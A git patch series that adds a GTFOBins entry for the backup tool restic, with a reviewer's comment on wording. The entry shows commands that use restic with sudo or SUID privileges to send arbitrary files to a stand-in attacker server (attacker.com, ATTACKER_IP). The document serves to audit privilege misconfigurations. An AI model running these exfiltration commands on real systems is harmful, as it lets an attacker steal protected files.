From b2a2b3a5f07a15c18a98fa241b4a552b75bbf8b5 Mon Sep 17 00:00:00 2001
From: PreethamBomma <41102108+PreethamBomma@users.noreply.github.com>
Date: Mon, 6 Apr 2020 22:20:51 +0530
Subject: [PATCH 1/3] Add restic.md
---
 _gtfobins/restic.md | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 _gtfobins/restic.md
diff --git a/_gtfobins/restic.md b/_gtfobins/restic.md
new file mode 100644
index 0000000..00d2d1f
--- /dev/null
+++ b/_gtfobins/restic.md
@@ -0,0 +1,18 @@
+---
+functions:
+ sudo:
+ - description: Restic can be used to backup files. Run the commands in the sequence given below.
+ code: |
+
+ rest-server --no-auth --listen http://ATTACKER_IP:PORT
+
+ TARGET=rest_repository
+ BACKUP=file_or_directory_to_backup
+ sudo restic init -r rest:http://ATTACKER_IP:PORT/$TARGET
+ sudo restic backup -r rest:http://ATTACKER_IP:PORT/$TARGET $BACKUP
+
+ TARGET=rest_repository
+ DESTINATION=backup_to_restore
+ mkdir /tmp/restic/$DESTINATION
+ restic restore -r /tmp/restic/$TARGET latest --target /tmp/restic/$DESTINATION
+---
From 9ec96219a35cadec8a0fb128207faa3d35cab5ed Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 12 Apr 2020 11:46:55 +0200
Subject: [PATCH 2/3] Fix line termination
---
 _gtfobins/restic.md | 36 ++++++++++++++++++------------------
 1 file changed, 18 insertions(+), 18 deletions(-)
diff --git a/_gtfobins/restic.md b/_gtfobins/restic.md
index 00d2d1f..bdc2c87 100644
--- a/_gtfobins/restic.md
+++ b/_gtfobins/restic.md
@@ -1,18 +1,18 @@
----
-functions:
- sudo:
- - description: Restic can be used to backup files. Run the commands in the sequence given below.
- code: |
-
- rest-server --no-auth --listen http://ATTACKER_IP:PORT
-
- TARGET=rest_repository
- BACKUP=file_or_directory_to_backup
- sudo restic init -r rest:http://ATTACKER_IP:PORT/$TARGET
- sudo restic backup -r rest:http://ATTACKER_IP:PORT/$TARGET $BACKUP
-
- TARGET=rest_repository
- DESTINATION=backup_to_restore
- mkdir /tmp/restic/$DESTINATION
- restic restore -r /tmp/restic/$TARGET latest --target /tmp/restic/$DESTINATION
----
+---
+functions:
+ sudo:
+ - description: Restic can be used to backup files. Run the commands in the sequence given below.
+ code: |
+
+ rest-server --no-auth --listen http://ATTACKER_IP:PORT
+
+ TARGET=rest_repository
+ BACKUP=file_or_directory_to_backup
+ sudo restic init -r rest:http://ATTACKER_IP:PORT/$TARGET
+ sudo restic backup -r rest:http://ATTACKER_IP:PORT/$TARGET $BACKUP
+
+ TARGET=rest_repository
+ DESTINATION=backup_to_restore
+ mkdir /tmp/restic/$DESTINATION
+ restic restore -r /tmp/restic/$TARGET latest --target /tmp/restic/$DESTINATION
+---
From 7f6221646b24430f49202635b4c121fb058ffaf8 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 12 Apr 2020 13:08:55 +0200
Subject: [PATCH 3/3] Fix and improve restic
---
 _gtfobins/restic.md | 51 ++++++++++++++++++++++++++++++++-------------
 1 file changed, 37 insertions(+), 14 deletions(-)
diff --git a/_gtfobins/restic.md b/_gtfobins/restic.md
index bdc2c87..ea362aa 100644
--- a/_gtfobins/restic.md
+++ b/_gtfobins/restic.md
@@ -1,18 +1,41 @@
 ---
+description: |
+ The attacker must setup a server to receive the backups, in the following example [rest-server](https://github.com/restic/rest-server/) is used but there are other options. To start a new instance and create a new repository:
+
+ ```console
+ RPORT=12345
+ NAME=backup_name
+ ./rest-server --listen ":$RPORT"
+ restic init -r "rest:http://localhost:$RPORT/$NAME"
+ ```
+
+ To extract the data from the restic repository in the current directory on the attacker side:
+
+ ```console
+ restic restore -r "/tmp/restic/$NAME" latest --target .
+ ```
+
+ Upload data to the attacker server with the following commands.
 functions:
+ file-upload:
+ - code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_or_dir_to_get
+ NAME=backup_name
+ restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"
 sudo:
- - description: Restic can be used to backup files. Run the commands in the sequence given below.
- code: |
-
- rest-server --no-auth --listen http://ATTACKER_IP:PORT
-
- TARGET=rest_repository
- BACKUP=file_or_directory_to_backup
- sudo restic init -r rest:http://ATTACKER_IP:PORT/$TARGET
- sudo restic backup -r rest:http://ATTACKER_IP:PORT/$TARGET $BACKUP
-
- TARGET=rest_repository
- DESTINATION=backup_to_restore
- mkdir /tmp/restic/$DESTINATION
- restic restore -r /tmp/restic/$TARGET latest --target /tmp/restic/$DESTINATION
+ - code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_or_dir_to_get
+ NAME=backup_name
+ sudo restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"
+ suid:
+ - code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_or_dir_to_get
+ NAME=backup_name
+ ./restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"
 ---
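Review bot: The restore example in the new `description` reads the repository from `/tmp/restic/$NAME`, but nothing in the entry says where that path comes from. It presumably relies on rest-server's default data directory, since the `./rest-server --listen ":$RPORT"` line sets no path. A sentence before that block, such as `The repository is read from /tmp/restic, where rest-server stores its data unless told otherwise.`, would make the example self-explanatory. In the same paragraph, `must setup a server` should read `must set up a server`. The closing sentence `Upload data to the attacker server with the following commands.` also leaves unstated that the `sudo` and `suid` variants read `$LFILE` with elevated privileges, which is the risk a reader auditing a sudoers rule or a SUID bit on restic needs to see.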